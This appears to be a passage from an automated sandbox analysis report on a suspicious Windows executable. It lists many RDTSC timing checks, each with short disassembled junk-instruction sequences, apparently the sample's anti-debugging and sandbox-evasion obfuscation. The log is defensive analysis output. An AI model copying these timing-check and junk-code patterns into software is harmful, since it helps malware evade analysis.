                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC5AFA second address: CC5B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550733D10h 0x00000009 jmp 00007F0550733D19h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC5E36 second address: CC5E40 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0550D663C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC6F14 second address: CC6F1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC720E second address: CC721E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F0550D663C6h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC7759 second address: CC775D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CC775D second address: CC7772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F0550D663C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d js 00007F0550D663C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CCC2EC second address: CCC30A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0550733D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0550733D0Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007F0550733D06h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CCC30A second address: CCC30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CCC30E second address: CCC32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0550733D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0550733D11h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CCB7DF second address: CCB7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD09B9 second address: CD09BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD9611 second address: CD9616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD9616 second address: CD961D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C227F5 second address: C22825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550D663CDh 0x00000009 jmp 00007F0550D663D8h 0x0000000e jne 00007F0550D663C6h 0x00000014 popad 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C22825 second address: C2282F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0550733D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD7C42 second address: CD7C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD7C5B second address: CD7C61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD7C61 second address: CD7C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0550D663C6h 0x0000000e jbe 00007F0550D663C6h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD8251 second address: CD8255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD8255 second address: CD8287 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0550D663C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0550D663CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0550D663D9h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD866C second address: CD8682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0550733D0Dh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD949D second address: CD94B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550D663D1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD7427 second address: CD742C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CD742C second address: CD7431 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE0918 second address: CE0924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0550733D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE0924 second address: CE0935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663CBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE0935 second address: CE0939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE0939 second address: CE093D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE093D second address: CE094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE065C second address: CE0662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CE0662 second address: CE0666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CEFB5C second address: CEFB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CEFB66 second address: CEFBA5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0550733D0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F0550733D0Eh 0x00000011 pushad 0x00000012 popad 0x00000013 jg 00007F0550733D06h 0x00000019 pushad 0x0000001a jmp 00007F0550733D10h 0x0000001f js 00007F0550733D06h 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CEFBA5 second address: CEFBAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CEF6B9 second address: CEF6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF7AA4 second address: CF7AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF7AAD second address: CF7AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF7AB3 second address: CF7AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF7AB7 second address: CF7ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF7ABF second address: CF7AC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0550D663CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF9D1E second address: CF9D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: CF9D22 second address: CF9D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D00BB8 second address: D00BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D00BBE second address: D00BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D021DF second address: D021E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D021E3 second address: D021E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D021E7 second address: D021EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D021EF second address: D02206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F0550D663C6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D02206 second address: D0220A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D07F92 second address: D07FB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0550D663C8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0550D663CAh 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E661 second address: D0E667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E667 second address: D0E68C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0550D663D9h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E68C second address: D0E6C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jp 00007F0550733D3Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0550733D13h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E6C6 second address: D0E6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0D378 second address: D0D37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0D4C6 second address: D0D500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0550D663D9h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0D500 second address: D0D54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F0550733D06h 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0550733D0Dh 0x00000015 pop edi 0x00000016 jmp 00007F0550733D16h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0550733D13h 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0D54B second address: D0D551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0D6D8 second address: D0D6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0550733D06h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E36B second address: D0E371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E371 second address: D0E37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0550733D08h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D0E37D second address: D0E389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F0550D663C6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D12E26 second address: D12E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D12E2A second address: D12E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D12E32 second address: D12E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0550733D19h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D12E51 second address: D12E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0550D663C6h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D22B7A second address: D22B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550733D0Ah 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D22B89 second address: D22B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663D0h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D30B03 second address: D30B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D359AF second address: D359B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4C6D5 second address: D4C6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550733D0Eh 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F0550733D06h 0x00000011 popad 0x00000012 push ebx 0x00000013 jne 00007F0550733D06h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4C6FE second address: D4C702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4C702 second address: D4C730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0550733D14h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4CB64 second address: D4CB6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4CE77 second address: D4CE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4CE7E second address: D4CE83 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4CE83 second address: D4CE8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4CE8F second address: D4CE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4CFFA second address: D4D020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0550733D06h 0x0000000a jmp 00007F0550733D11h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F0550733D06h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4D020 second address: D4D026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4D426 second address: D4D42C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4D42C second address: D4D461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F0550D663CEh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F0550D663DCh 0x00000017 push ebx 0x00000018 jo 00007F0550D663C6h 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE01 second address: D4EE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0550733D15h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE23 second address: D4EE29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE29 second address: D4EE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE2D second address: D4EE31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE31 second address: D4EE3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE3C second address: D4EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F0550D663C6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D4EE4E second address: D4EE58 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0550733D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D505CE second address: D505D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D52EF3 second address: D52EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D5319F second address: D531A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D531A3 second address: D531A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D53477 second address: D5349D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0550D663CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0550D663D1h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: D5349D second address: D534A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
